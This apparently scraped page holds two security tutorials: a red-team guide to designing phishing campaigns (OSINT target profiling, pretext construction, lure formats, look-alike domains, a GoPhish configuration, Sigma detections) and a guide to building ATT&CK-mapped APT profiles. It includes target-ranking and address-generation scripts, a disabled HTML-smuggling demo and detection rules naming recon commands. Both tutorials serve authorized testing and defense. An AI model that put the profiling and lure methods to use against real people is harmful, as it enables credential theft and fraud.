  • Defenders ignore the shifting bytes and hunt the behavior — self-modifying RWX memory, CallTrace: UNKNOWN on Sysmon Event ID 10, and ACG/DEP violations on execution.

Related Tutorials

References

Phishing Campaign Design: Pretexting, Lures, and Target Profiling

The most common mistake I see from someone running their first authorized phishing engagement is treating it as an email problem. They obsess over the payload and the landing page, launch on day two, and wonder why the click rate is 4%. The professional sequence is inverted — the message is the last artifact you build. The dossier, the pretext, and the sender domain’s reputation decide whether anyone reads past the subject line. Everything else is decoration.

This walkthrough is written for authorized red teamers and the defenders who have to understand the adversary’s decision chain to break it. Every phase maps to MITRE ATT&CK, and every offensive step is paired with how a blue team sees it.


1. Rules of Engagement and Legal Scope

Phishing simulations touch real people and harvest real PII. None of what follows is legal without explicit, signed authorization. Before a single byte of recon:

  • Written authorization naming the target organization, the engagement window, and the specific techniques in scope (attachment vs. link vs. vishing).
  • A scoping statement that lists which domains, mailboxes, and employee groups are fair game — and which are explicitly off-limits (legal, HR, executives’ personal accounts).
  • Data-handling rules. Harvested credentials, breach-dump matches, and scraped employee data are PII. Encrypt at rest, define a retention window, and destroy on engagement close. You are a custodian, not a collector.
  • An abort and de-confliction path so the SOC’s incident response doesn’t burn a weekend chasing your simulation.

If you can’t point to the paragraph in the contract that authorizes a technique, you don’t run it.


2. The Adversary’s Pre-Attack Workflow

Real intrusion sets — APT29, Kimsuky, TA453 — don’t improvise lures. They build a target list first, under the Reconnaissance tactic (TA0043), long before any email leaves an outbox. The workflow is iterative: start with a broad pool of harvested identities, enrich each with org and role context, then narrow to a short list of high-value recipients whose job function makes a specific pretext plausible.

The reason this matters to defenders: most of this generates zero target-side telemetry. Passive identity collection (T1589) reads breach databases and LinkedIn; nothing hits your logs. Your first detectable event is often the inbound message itself — which means the controls that matter most are the ones that limit exposure before the campaign and inspect delivery during it.


Flow diagram showing the adversary pre-attack workflow from identity harvesting through org enrichment, target ranking, pretext building, delivery, and credential harvesting with MITRE ATT&CK technique labels on each step
Real threat actors build the dossier long before composing a message — nearly every stage up to delivery generates zero target-side telemetry.

3. Target Profiling via OSINT

Passive vs. Active Reconnaissance

Passive recon never touches the target’s infrastructure — breach dumps, social media, cached pages. Active recon (port scans, mail-server probing) does, and it’s noisier. A good profiling phase stays passive as long as possible.

The ATT&CK techniques in play:

TechniqueMITRE IDWhat it feeds
Gather Victim Identity InformationT1589Names, emails, exposed credentials
Email AddressesT1589.002Format enumeration (first.last@)
Employee NamesT1589.003Org-chart and LinkedIn scraping
Gather Victim Org InformationT1591Departments, hierarchy
Business RelationshipsT1591.002Vendor/partner pretext chains
Identify RolesT1591.004Who approves wires, who resets passwords
Search Open WebsitesT1593.001Social-media profiling
Search Open Technical DatabasesT1596Cert transparency, Shodan, WHOIS

Once you know the email format, every name you scrape becomes an address. That’s the whole point of T1589.002:

import itertools

# T1589.002 — derive addresses from a known naming convention.
formats   = ["{first}.{last}", "{f}{last}", "{first}{l}"]
domain    = "example.com"
employees = [("jane", "doe"), ("ahmed", "khan")]

for first, last in employees:
    for fmt in formats:
        addr = fmt.format(first=first, last=last,
                          f=first[0], l=last[0]) + "@" + domain
        print(addr)   # later: validate against MX / catch-all behavior

Scraped profile data turns into a prioritized target map. The goal is T1591.004 — separate the people who can wire money or reset passwords from everyone else:

import json

# T1591.004 — convert scraped profiles into a ranked target list.
with open("profiles.json") as f:
    people = json.load(f)

HIGH_VALUE = {"finance", "accounts payable", "it", "helpdesk", "executive"}

for p in people:
    dept = p.get("department", "").lower()
    priority = "HIGH" if any(k in dept for k in HIGH_VALUE) else "low"
    print(f"{priority:4} | {p['name']:24} | {p['title']}")

Infrastructure and tech-stack intelligence (T1596) tunes the theme. If certificate transparency logs reveal a Citrix or VPN gateway, “your VPN certificate expires in 24 hours” becomes credible:

# T1596 — map the footprint from public technical databases.
whois example.com | grep -Ei 'registrar|creation|name server'
dig +short MX example.com               # mail routing → gateway vendor fingerprint

# Certificate Transparency: enumerate subdomains without touching the target.
curl -s "https://crt.sh/?q=%25.example.com&output=json" \
  | jq -r '.[].name_value' | sort -u
ToolDescriptionLink
theHarvesterEmail/domain/name harvesting from public sourcesgithub.com
MaltegoGraphical link analysis for org mappingmaltego.com
Hunter.ioEmail format discovery and verificationhunter.io
Recon-ngModular OSINT frameworkgithub.com
Have I Been PwnedCredential-exposure checkinghaveibeenpwned.com
OSINT FrameworkCurated index of profiling resourcesosintframework.com

4. Pretexting Fundamentals

A pretext is a fabricated backstory that gives the lure context. The believable ones lean on a small set of influence principles:

PrincipleDescription
AuthorityImpersonating IT helpdesk, C-suite, auditors, or law enforcement
Urgency / Scarcity“Account expires in 24 hours,” “final warning before suspension”
Social proofReferencing real colleagues, known vendors, ongoing projects
Likability / FamiliarityHijacking an existing email thread (reply-chain phishing)
Pretext narrativeA plausible story matching the target’s job and industry

The skeleton that turns those principles into a message:

[ROLE the sender claims]        -> "Microsoft 365 Security Team"
+ [AUTHORITY trigger]           -> policy / compliance / mandate
+ [URGENCY hook]                -> "session expires in 24h"
+ [ACTION request]              -> "re-verify at <link>"
+ [PLAUSIBLE sender + branding] -> aged look-alike domain, correct logo
= a lure that survives the recipient's first three seconds of scrutiny

Matching the Pretext to the Role

Profiling pays off here. A generic lure addressed to everyone is weaker than three tailored ones. Finance gets invoice-fraud and vendor-payment-change narratives. IT and helpdesk staff get credential-reset and MFA-enrollment pretexts. Executives get CEO-fraud and board-document lures. The pretext has to fit what the recipient already expects to receive on a normal Tuesday.


Hierarchy diagram mapping a profiled target list into three role groups — Finance, IT/Helpdesk, and Executive — each branching to its tailored pretext lure type
Profiling converts a generic target pool into role-specific pretexts; a lure matched to the recipient’s actual workflow is exponentially more convincing than a broadcast message.

5. Lure Design and Delivery Vector Selection

The delivery vector is T1566 (Phishing), and the sub-technique you pick is a trade-off between trust, evasion, and what the target’s controls inspect:

Sub-techniqueIDDelivery mechanism
Spearphishing AttachmentT1566.001Malicious file — Office doc, PDF, ISO, LNK, OneNote
Spearphishing LinkT1566.002Link to harvesting page or payload host
Spearphishing via ServiceT1566.003Teams, Slack, LinkedIn DM, cloud storage
Spearphishing VoiceT1566.004Vishing / callback phishing

Attachment campaigns rely on User Execution (T1204.002) — the victim has to open and trigger the file. Links exist precisely to avoid attachment scanning. If a gateway detonates attachments, you move to a link; if it rewrites links, you move to something the scanner doesn’t understand.

Lure formatAbuse scenario
ISO / VHD in archiveContainer strips Mark-of-the-Web from the inner payload
LNK fileShortcut launches a hidden interpreter on double-click
OneNote attachmentEmbedded “click to view” object spawns a child process
Double-extension fileinvoice.pdf.exe reads as a PDF in a narrow window
QR code (“quishing”)URL lives in an image — no clickable link for gateways to parse
HTML smugglingBrowser assembles the payload locally from inline data

HTML smuggling is worth understanding because it inverts the perimeter: the file never crosses the network as a file, so attachment and URL scanners see only plain HTML.

<!-- Illustrative ONLY — shows why HTML smuggling evades file/URL scanners.
     The "payload" never traverses the network as a file; the browser builds it
     locally from a string already inside the HTML. The gateway sees inert markup. -->
<script>
  const data = atob("SGVsbG8gZnJvbSB0aGUgYnJvd3Nlcg==");   // benign demo content
  const blob = new Blob([data], { type: "application/octet-stream" });
  const url  = URL.createObjectURL(blob);
  const a    = document.createElement("a");
  a.href = url; a.download = "invoice.txt";                // forces a local "save"
  // a.click();   // auto-trigger left disabled deliberately
</script>

6. Sender Infrastructure and Spoofing

Delivery fails at the envelope if the sender looks wrong. Adversaries register look-alike domains (T1583.001) — corp-helpdesk.example against the real corp.helpdesk.example — and warm up aged sending accounts (T1585.002) so they pass reputation filters. The highest-trust option is hijacking a real conversation from a compromised third-party mailbox (T1586.002), where the reply lands inside an existing thread the victim already trusts.

From the attacker’s chair, the three email-authentication records define what’s possible:

ControlWhat it does
SPF (TXT)Authorizes sending IPs; ~all softfails, -all hardfails
DKIMCryptographic signature over headers/body; detects mid-transit tampering
DMARCEnforces policy (p=reject / p=quarantine / p=none) on SPF/DKIM failure and binds both to the From: header via alignment

Direct domain spoofing dies against a hard -all SPF record plus DMARC p=reject. That’s why attackers pivot to look-alike domains — a domain you control passes its own SPF and DKIM cleanly, and DMARC has nothing to complain about because the From: is genuinely yours.

A war story worth your hour: I once burned a beautifully aged look-alike domain in the first thirty minutes of a campaign because the landing page’s TLS certificate had been issued that morning. A switched-on analyst pulled the cert transparency log, saw a brand-new cert on a brand-new host receiving inbound clicks, and quarantined the whole run. The same crt.sh query you use to profile a target is the one defenders use to catch you. Provision infrastructure days ahead, not minutes.


Flow diagram showing an inbound email passing sequentially through SPF, DKIM, and DMARC authentication checks with pass paths leading to inbox delivery and fail paths leading to quarantine or rejection
Direct domain spoofing is defeated by SPF -all plus DMARC p=reject — which is precisely why attackers pivot to look-alike domains that pass their own authentication cleanly.

7. Reconnaissance Phishing vs. Payload Delivery

Not every phishing message delivers malware. T1598 (Phishing for Information) sits under Reconnaissance — it tricks the target into divulging credentials or actionable data with no payload at all. A fake login portal (T1598.003) harvests a password; callback phishing extracts data verbally over the phone. The defining indicator: no malicious attachment, no exploit-laden link. That absence is what distinguishes T1598 from T1566.

Two modern variants defeat MFA and deserve detection-level treatment (no working frameworks here):

  • Adversary-in-the-Middle (T1557). A reverse proxy relays the victim’s real login to the real service and captures the session cookie issued after a successful MFA prompt. The stolen cookie replays the authenticated session — the second factor never protected anything because it already passed.
  • MFA Request Generation (T1621). Push-bombing a target with repeated approval prompts until fatigue or confusion yields a tap.
  • OAuth device-code phishing. Abusing the device-authorization flow to capture tokens without ever touching a password, against M365 and Google Workspace.

The defensive answer to all three is phishing-resistant authentication — FIDO2 / passkeys — which is not susceptible to relay because the credential is bound to the legitimate origin.


8. Campaign Execution and Metrics

For authorized simulations, GoPhish handles sending profiles, landing pages, and tracking. The shape of a scoped, consented campaign:

# Authorized simulation only. Illustrative profile + campaign shape.
sending_profile:
  name: "IT Helpdesk Sim"
  from_address: "helpdesk@corp-helpdesk.example"   # pre-warmed look-alike
  host: "smtp.relay.internal:587"
  username: "sim-sender"
  ignore_cert_errors: false

campaign:
  name: "Q3 Awareness - Password Reset"
  url: "https://corp-helpdesk.example/reset"        # tracked landing page
  launch_date: "2026-07-01T09:00:00Z"
  tracking_pixel: true                              # open-rate beacon
  groups: ["finance-pilot"]                         # scoped, consented list

Read the metrics honestly. Open rate measures subject-line and sender plausibility. Click rate measures pretext strength. Submit rate — credentials actually entered — is the number that matters for risk, and it’s the one you report. Don’t shame individuals; aggregate by department and feed the result back into training. And when the engagement closes, destroy the harvested submissions per your data-handling rules.


9. Detection and Defense — The Defender’s View

Recon is invisible, so defense concentrates at delivery and execution. Email authentication is the first wall: enforce DMARC p=reject with alignment, and teach analysts to read the headers.

# Defender view: read Authentication-Results to spot spoofing.
$headers = Get-Content .\suspicious.eml -Raw
[regex]::Matches($headers, 'Authentication-Results:.*?(?=\r?\n\S)') |
    ForEach-Object { $_.Value }
# Flag: spf=fail, dkim=fail, dmarc=fail (or dmarc=none = no enforcement)
Flow diagram illustrating the defender detection kill chain from email delivery through DMARC authentication, gateway sandbox, user execution, Sysmon process-creation event capture, and Sigma rule alert escalation to the SOC
Because recon is invisible, defense must layer at delivery (email auth, gateway) and execution (Sysmon EID 1, Sigma rules) to catch what passive OSINT collection never exposes.

Post-delivery, the payload betrays itself through process lineage. Key Sysmon events:

Event IDNameRelevance to phishing
1Process Createoutlook.exepowershell.exe, winword.execmd.exe
3Network ConnectionUnusual outbound from an Office app (C2 callback)
11File CreatedAttachment written to %TEMP%\Outlook Temp\
15FileCreateStreamHashZone.Identifier ADS confirms internet origin (MOTW)
22DNS QueryOffice or browser DNS right after lure interaction

The canonical detection — an Office app spawning a script interpreter:

title: Office Application Spawning a Script Interpreter
id: 6c4f1a2e-phishing-office-child
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith:
      - '\winword.exe'
      - '\excel.exe'
      - '\outlook.exe'
      - '\onenote.exe'
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\mshta.exe'
      - '\wscript.exe'
      - '\cscript.exe'
  condition: selection
tags:
  - attack.initial_access
  - attack.t1566.001
  - attack.t1204.002
level: high

Catch attachment execution by its working directory:

title: Process Execution From Outlook Attachment Temp Path
id: 9a2b7c10-phishing-outlook-temp
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    CurrentDirectory|contains: '\Content.Outlook\'
  condition: selection
tags:
  - attack.initial_access
  - attack.t1566.001
level: high

Credential-harvest fallout shows up in the Security log — 4625 (failed logon), 4740 (lockout from spray), 4688 (process creation with command-line auditing) — and in M365 / Entra ID sign-in risk events. Hardening that actually moves the needle:

  • ASR rules blocking Office apps from spawning child processes.
  • Protected View + Trust Center disabling internet-origin macros by default, with MOTW enforced even for archive-extracted files to kill the ISO bypass.
  • Safe Links / Safe Attachments for click-time URL rewriting and sandbox detonation.
  • FIDO2 / passkeys over push-based MFA — the only control that survives AiTM.
  • Limiting public OSINT exposure — shallow public org charts, undisclosed email formats, sanitized job postings.
  • Awareness training using current lures (ISO, OneNote, QR), not just decade-old attachment scares.

10. MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Gather Victim Identity InformationT1589Largely invisible; monitor breach exposure, 4625/4740 downstream
Gather Victim Org Information / RolesT1591 / T1591.004Limit public org-chart depth
Search Open Technical DatabasesT1596Monitor own CT logs for look-alike certs
Acquire Infrastructure: DomainsT1583.001Newly-registered-domain blocking at gateway
Compromise Accounts: EmailT1586.002Anomalous reply-chain sender, header mismatch
PhishingT1566Email auth, gateway telemetry, Sysmon EID 1
Spearphishing AttachmentT1566.001Sysmon EID 1/11/15, Office child-process Sigma
Spearphishing LinkT1566.002Safe Links, URL detonation
Spearphishing VoiceT1566.004Helpdesk verification policy, user reporting
User Execution: Malicious FileT1204.002Parent-child process chain
Phishing for InformationT1598Link to harvest page with no payload
Adversary-in-the-MiddleT1557Impossible-travel, session anomalies; FIDO2
MFA Request GenerationT1621Repeated push prompts in sign-in logs

Summary

  • A phishing campaign is won during reconnaissance, not in the message — the dossier and pretext decide the outcome before delivery.
  • Target profiling chains passive OSINT (T1589, T1591, T1593, T1596) into a ranked list, generating almost no target-side telemetry.
  • Pretexts weaponize authority, urgency, and familiarity; the strongest ones match the recipient’s actual job function.
  • Delivery vector (T1566 sub-techniques) is a trade-off against the controls in place — attachment, link, service, or voice — with ISO, OneNote, quishing, and HTML smuggling as modern evasion paths.
  • T1598 harvests data with no payload, and AiTM (T1557) defeats push-based MFA — both demand phishing-resistant FIDO2.
  • Defenders win at delivery and execution: enforce DMARC p=reject, hunt Office child-process chains via Sysmon EID 1, and convert every red-team finding into a concrete blue-team control.

Related Tutorials

References

APT Profiling: How to Build a Comprehensive Adversary Profile from Open-Source Intelligence

Objective: Learn how to systematically collect, structure, and operationalize open-source intelligence into a complete, ATT&CK-mapped adversary profile — a defensible dossier that drives realistic adversary emulation, detection-gap analysis, and threat-informed defense.


1. What Is an Adversary Profile and Why Build One

An adversary profile is a structured dossier describing who a threat actor is, what they target, how they operate, and which tools and infrastructure they favor — all normalized to a shared taxonomy. It is the durable opposite of an IOC-only feed.

An IOC feed gives you hashes and IP addresses that expire in days. A profile captures the actor’s tactics, techniques, and procedures (TTPs), which change slowly and cost the adversary real effort to alter. A finished profile is the source artifact for three downstream activities:

  • Adversary emulation — sequencing a real group’s TTPs into a test plan.
  • Detection engineering — overlaying the profile against your sensor coverage to find gaps.
  • Risk communication — translating actor capability and intent for leadership.

Threat intelligence comes in four flavors, and a good profile feeds all of them: strategic (executive risk), tactical (SOC TTPs), operational (incident-response context), and technical (machine-readable indicators).


2. The Intelligence Lifecycle Applied to APT Profiling

Cyber threat intelligence is produced through a six-phase lifecycle. Profiling is just this lifecycle scoped to a single actor.

PhaseProfiling Activity
Planning / DirectionDefine the intelligence requirement: “Which APT threatens our sector, and can we detect its TTPs?”
CollectionGather vendor reports, advisories, passive DNS, malware samples
ProcessingNormalize raw reports; extract candidate TTPs and IOCs
AnalysisMap to ATT&CK, assess confidence, resolve naming conflicts
DisseminationPublish as STIX bundle, Navigator layer, and emulation plan
FeedbackRefine the profile as new reporting and red-team results arrive

Start with an explicit Priority Intelligence Requirement (PIR) or Request for Information (RFI). Without a scoped question, collection sprawls and the profile never converges.


3. Analytical Frameworks: Diamond Model, Kill Chain, and ATT&CK

Three frameworks provide complementary lenses. Use all three — they are not interchangeable.

FrameworkRole in APT Profiling
MITRE ATT&CKMaps observed TTPs to a standardized taxonomy for comparison and emulation
Cyber Kill Chain (Lockheed Martin)Sequences behaviors across reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on objectives
Diamond ModelRelates the four core intrusion elements: Adversary, Infrastructure, Capability, Victim

The Diamond Model is the pivoting engine. Each intrusion event has four interconnected vertices, and the relationships between them drive investigation. The adversary–infrastructure edge reveals how operators stand up C2; the victim–capability edge exposes which tooling is used against which target. Unlike the sequential Kill Chain, the Diamond Model excels at attribution and visualizing relationships — pivot from a known malware sample to the infrastructure that served it, then to other victims of the same infrastructure.

ATT&CK then supplies the granular vocabulary that makes those pivots comparable across reports and across teams.


Diamond Model vertices (Adversary, Infrastructure, Capability, Victim) interconnected with edges, annotated with Kill Chain sequencing and ATT&CK TTP taxonomy as complementary overlays
The Diamond Model drives adversary-infrastructure pivoting, the Kill Chain orders the attack sequence, and ATT&CK supplies the precise technique vocabulary — all three are required for a complete profile.

4. OSINT Collection: Primary Source Taxonomy

OSINT spans news media, social media, public records, government publications, academic research, commercial data, and the deep/dark web. For APT profiling, prioritize these primary source classes and score each for reliability.

Source TypeDescription
Vendor threat reportsMandiant, CrowdStrike Intelligence, Microsoft MSTIC, Secureworks CTU, Elastic Security Labs, SpecterOps
Government advisoriesCISA advisories (often with embedded ATT&CK mappings), NSA/CISA joint advisories, FBI Flash
MITRE ATT&CK GroupsCurated, attributed group profiles at attack.mitre.org/groups/
Malware repositoriesVirusTotal, MalwareBazaar, Hybrid Analysis for tooling attribution
Infrastructure / passive DNSShodan, Censys, DomainTools, WHOIS/RDAP, certificate transparency logs
Code repositoriesGitHub/GitLab for leaked tooling and infrastructure-as-code patterns

Infrastructure pivoting is largely passive. The example below queries Shodan for hosts matching a documented C2 fingerprint — a benign illustration of the adversary–infrastructure edge.

import shodan

API_KEY = "YOUR_API_KEY"      # placeholder — never commit real keys
api = shodan.Shodan(API_KEY)

# Pivot on a publicly documented C2 framework fingerprint
query = 'product:"Cobalt Strike Beacon" ssl.cert.subject.CN:"example-c2.test"'
results = api.search(query)

for host in results["matches"]:
    print(host["ip_str"], host.get("port"), host.get("org"))

Rate every source with the Admiralty Code: source reliability (A–F) and information credibility (1–6). A single vendor blog is B2 at best; corroboration across two independent vendors plus a government advisory raises confidence.


5. Building the Adversary Dossier

Capture the profile in a fixed schema so that every actor is described the same way and TTP heatmaps are comparable. Use this template as your reference document.

FieldContent
Actor IDCanonical tracker (e.g., ATT&CK G0016)
AliasesAssociated group names and vendor designations
NexusSuspected country of origin / state sponsorship
MotivationEspionage, financial, ideological, destructive
Active SinceFirst reported activity date
TargetingSectors, geographies, victim profile
ToolingMalware families and offensive tools
Infrastructure PatternsRegistrar habits, ASN clusters, cert reuse, C2 conventions
ATT&CK TechniquesNormalized technique-ID list with frequency
IOCsHashes, domains, IPs (with confidence and decay date)
ConfidenceAdmiralty rating per claim
SourcesCited reports with retrieval dates

ATT&CK’s Group object aligns directly with several of these fields, so anchor your dossier to it.

FieldDescription
Group IDUnique identifier (e.g., G0016 for APT29)
Associated GroupsPublicly reported overlapping names (formerly “Aliases”)
DescriptionActivity dates, suspected attribution, targeted industries
Techniques UsedTechniques with a note on how the group used each
SoftwareMalware and tool families attributed to the group
CampaignsNamed, time-bounded intrusion clusters

ATT&CK currently tracks 176 groups, each with attribution, targeted geographies, and targeted sectors.


Hierarchical diagram showing an Adversary Profile root node branching into six structured fields: Identity and Attribution, Targeting, ATT&CK TTP Heatmap, Tools and Malware, Infrastructure Patterns, and Admiralty Confidence Rating
A fixed dossier schema ensures every actor profile shares the same structure, making TTP heatmaps and coverage gap analyses directly comparable across groups.

6. ATT&CK Mapping: Extracting and Normalizing Techniques

Follow CISA’s Best Practices for MITRE ATT&CK Mapping: read the report, find the behavior, then map to the most specific technique the evidence supports. The cardinal sin is over-mapping — claiming a sub-technique when the text only justifies a tactic.

A conceptual keyword-to-technique pass illustrates semi-automated extraction. This is not a production NLP classifier; treat it as a triage aid that an analyst validates.

import json

# Local ATT&CK Enterprise snapshot (STIX bundle) loaded for ID validation
with open("enterprise-attack.json") as f:
    bundle = json.load(f)

# Illustrative keyword -> technique lookup, manually curated
keyword_map = {
    "spearphishing attachment": "T1566.001",
    "powershell":               "T1059.001",
    "wmi":                      "T1047",
    "scheduled task":          "T1053.005",
    "lsass":                   "T1003.001",
}

report = """The actor sent a spearphishing attachment, used PowerShell to
run a loader, registered a scheduled task for persistence, and dumped
credentials from LSASS."""

report_l = report.lower()
hits = sorted({tid for kw, tid in keyword_map.items() if kw in report_l})
print(hits)   # ['T1003.001', 'T1053.005', 'T1059.001', 'T1566.001']

Every machine-suggested ID gets human confirmation against the report sentence before it enters the profile.


7. Querying ATT&CK Group Data Programmatically

MITRE publishes ATT&CK as STIX. Pull a group’s techniques directly with mitreattack-python rather than scraping the website.

from mitreattack.stix20 import MitreAttackData

mitre = MitreAttackData("enterprise-attack.json")

# Resolve the documented group by alias (use real, attributed groups only)
group = mitre.get_groups_by_alias("APT29")[0]   # G0016

techniques = mitre.get_techniques_used_by_group(group.id)
for entry in techniques:
    tech = entry["object"]
    attack_id = mitre.get_attack_id(tech.id)
    print(attack_id, tech.name)

You can also reach the live TAXII 2.1 server and walk the relationship graph yourself — pivoting intrusion-setusesattack-pattern.

from taxii2client.v21 import Server
from stix2 import TAXIICollectionSource, Filter

server = Server("https://attack-taxii.mitre.org/api/v21/")
collection = server.api_roots[0].collections[0]   # Enterprise ATT&CK
src = TAXIICollectionSource(collection)

group = src.query([Filter("type", "=", "intrusion-set"),
                   Filter("name", "=", "APT29")])[0]

for rel in src.relationships(group.id, "uses", source_only=True):
    if rel.target_ref.startswith("attack-pattern"):
        print(src.get(rel.target_ref).name)

8. ATT&CK Navigator Layers and Coverage Gap Analysis

The ATT&CK Navigator renders technique sets as a heatmap. Export a group’s techniques as a layer JSON, score each by observed frequency, and drag the file into the Navigator web app. Below is a v4 layer for a documented group.

{
  "name": "G0016 APT29 - Observed TTPs",
  "versions": { "attack": "14", "navigator": "4.9.1", "layer": "4.5" },
  "domain": "enterprise-attack",
  "techniques": [
    { "techniqueID": "T1566.001", "score": 5, "color": "#fc3b3b",
      "comment": "Spearphishing attachment - multiple campaigns" },
    { "techniqueID": "T1059.001", "score": 4, "color": "#fc6b3b",
      "comment": "PowerShell loaders" },
    { "techniqueID": "T1003.001", "score": 3, "color": "#fc9d3b",
      "comment": "LSASS credential access" }
  ],
  "gradient": {
    "colors": ["#ffffff", "#fc3b3b"], "minValue": 0, "maxValue": 5
  }
}

The power move is layer arithmetic: load the actor layer and your team’s detection coverage layer, then compute their difference. Techniques the actor uses that your sensors do not cover are your prioritized hardening backlog. Overlaying two actor layers instead reveals shared TTPs worth emulating once to cover multiple threats.


9. Structuring the Profile in STIX 2.1

To make the profile machine-readable and shareable over TAXII, serialize it as STIX. Platforms such as MISP, OpenCTI, ThreatConnect, and Anomali ThreatStream ingest this directly.

STIX SDOMaps To
threat-actorActor identity, aliases, motivation, sophistication
intrusion-setNamed activity cluster (e.g., “APT29”)
attack-patternAn ATT&CK technique via external_references
malwareFamily with malware_types, is_family
toolLegitimate software used offensively
campaignA time-bounded activity cluster
indicatorA STIX pattern, e.g. [file:hashes.'SHA-256' = '...']
relationshipLinks SDOs (uses, attributed-to)
{
  "type": "bundle", "id": "bundle--6f3a...",
  "objects": [
    { "type": "intrusion-set", "spec_version": "2.1",
      "id": "intrusion-set--1a2b...", "name": "APT29",
      "aliases": ["Cozy Bear"] },
    { "type": "attack-pattern", "spec_version": "2.1",
      "id": "attack-pattern--3c4d...", "name": "Spearphishing Attachment",
      "external_references": [
        { "source_name": "mitre-attack", "external_id": "T1566.001" } ] },
    { "type": "malware", "spec_version": "2.1",
      "id": "malware--5e6f...", "name": "WELLMESS",
      "is_family": true, "malware_types": ["backdoor"] },
    { "type": "relationship", "spec_version": "2.1",
      "id": "relationship--7a8b...", "relationship_type": "uses",
      "source_ref": "intrusion-set--1a2b...",
      "target_ref": "attack-pattern--3c4d..." }
  ]
}

10. The Pyramid of Pain and Attribution Confidence

David Bianco’s Pyramid of Pain (2013) explains why TTP-based profiling outlasts IOC-based profiling. From the bottom (trivial for the adversary to change) to the top (expensive and painful):

  • Hash values → trivially recompiled
  • IP addresses → rotated in minutes
  • Domain names → re-registered cheaply
  • Network/host artifacts → moderate effort
  • Tools → significant rework
  • TTPs → the adversary must relearn how they operate

Profiling for the top of the pyramid forces the adversary to change behavior, not just infrastructure. That is the entire defensive case for TTP-centric profiles.

Treat attribution skeptically. Multiple vendors track overlapping activity under different names, and their group boundaries may disagree. Record an explicit confidence rating (Admiralty Code or an Assessed/Confirmed scale) per claim, and never collapse two vendor clusters into “the same actor” without corroboration.


Pyramid of Pain hierarchy from Hash Values at the base through IP Addresses, Domain Names, Artifacts, and Tools up to TTPs at the apex, with edge labels indicating the adversary cost to change each indicator type
Profiling for the apex of the Pyramid forces adversaries to change how they operate, not just which infrastructure they use — the core defensive argument for TTP-centric intelligence.

11. From Profile to Emulation Plan

The finished profile drives an emulation plan in the style of the CTID Adversary Emulation Library. Translate the TTP heatmap into a prioritized, sequenced scenario:

  • Sequence techniques along the Kill Chain — initial access, execution, persistence, credential access, exfiltration.
  • Prioritize by impact, current detection coverage (from the Navigator gap analysis), and business relevance.
  • Constrain the plan to documented behaviors; emulate procedures, not improvised tradecraft.

The output is a runnable, scoped test that exercises exactly the techniques your real adversary uses — and validates the detections you built from the same profile.


Left-to-right flow diagram from OSINT Collection through Adversary Dossier and STIX Serialization to Navigator Gap Analysis, then Emulation Plan and Detection Validation
The finished adversary profile feeds two parallel downstream pipelines — machine-readable STIX for TIP ingestion, and a Navigator gap layer that directly sequences the emulation test plan.

12. Common Attacker Techniques

A profile must capture what the adversary does during its own reconnaissance and resource development — the pre-attack behaviors you study and emulate.

TechniqueDescription
Gather identity informationHarvest credentials, emails, employee names (T1589)
Gather network informationEnumerate DNS, IP ranges, topology (T1590)
Gather org informationIdentify roles, business tempo, relationships (T1591)
Gather host informationFingerprint software, hardware, configs (T1592)
Search open websitesSocial media, search engines, code repos (T1593)
Active scanningPort, vulnerability, wordlist scanning (T1595)
Acquire / develop capabilitiesRegister infra, build or buy tooling (T1583, T1587, T1588)

13. Defensive Strategies & Detection

Profiling cuts both ways: detect adversaries profiling you, and validate coverage against a finished profile. Correlate weak recon signals across categories — perimeter scanning (T1595), web fingerprinting (T1592), and email harvesting (T1589) together indicate targeted pre-attack planning.

Detection AreaSpecifics
Web server logsScanner user-agents (Masscan, ZGrab); sequential 404 bursts (T1595.003)
DNS monitoringAXFR zone-transfer attempts; unusual PTR sweeps (T1590.002)
HoneytokensPlanted career-page emails that fire on first contact (T1589.002)
Cert TransparencyAlerts on lookalike-domain issuance (T1583/T1584)
Identity logsEvent ID 4624 correlated with 4662 for LDAP/AD enumeration

Host-based recon once inside is visible to Sysmon: Event ID 1 (Process Create) catches nslookup, nltest, net view; Event ID 3 (Network Connection) surfaces internal scanning; Event ID 22 (DNS Query) enumerates lookups. Enable Audit Directory Service Access and command-line auditing (4688).

title: Domain Trust and Group Reconnaissance via Built-in Tools
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    CommandLine|contains:
      - 'nltest /domain_trusts'
      - 'net group "domain admins"'
      - 'net view /domain'
  condition: selection
level: medium

Centralize network, endpoint, identity, and threat-intel telemetry into one analytics platform, and ingest the profile’s STIX into a TIP (MISP/OpenCTI) so IOCs correlate against live data automatically. Reduce your OSINT attack surface: prune public DNS records, enable WHOIS privacy, and strip version banners.


14. Tools for Adversary Profiling

ToolDescriptionLink
MITRE ATT&CK NavigatorTechnique heatmaps and layer arithmeticmitre-attack.github.io
mitreattack-pythonProgrammatic ATT&CK STIX queriesgithub.com
MISPThreat-intel platform, STIX/TAXII ingestionmisp-project.org
OpenCTIKnowledge graph for actors and TTPsopencti.io
Shodan / CensysPassive internet asset discoveryshodan.io
DomainTools / RDAPWHOIS and passive DNS pivotingdomaintools.com
VirusTotal / MalwareBazaarTooling attribution from samplesvirustotal.com

15. MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Gather Victim Identity InformationT1589Honeytoken email triggers; phishing telemetry
Email AddressesT1589.002Planted-address alerting
Gather Victim Network InformationT1590AXFR / PTR sweep monitoring
DNST1590.002Microsoft-Windows-DNS-Client ETW
Gather Victim Org InformationT1591LinkedIn exposure review
Gather Victim Host InformationT1592Web fingerprinting in server logs
Search Open Websites/DomainsT1593Code-repo secret scanning
Search Victim-Owned WebsitesT1594Anomalous crawl patterns
Active ScanningT1595Perimeter scan / 404 burst detection
Acquire InfrastructureT1583Cert Transparency lookalike alerts
Compromise InfrastructureT1584Passive DNS pivoting
Develop / Obtain CapabilitiesT1587 / T1588Malware-repo attribution

Summary

  • An adversary profile is a structured, ATT&CK-mapped dossier of actor identity, targeting, tooling, and TTPs — the durable artifact IOC feeds cannot replace.
  • Run the six-phase intelligence lifecycle and fuse three frameworks: the Diamond Model for pivoting, the Kill Chain for sequencing, and ATT&CK for the TTP taxonomy.
  • Collect from vendor reports, government advisories, passive DNS, and malware repositories — and score every source with the Admiralty Code.
  • Serialize the result as STIX 2.1 and a Navigator layer so it feeds TIPs, gap analysis, and CTID-style emulation plans.
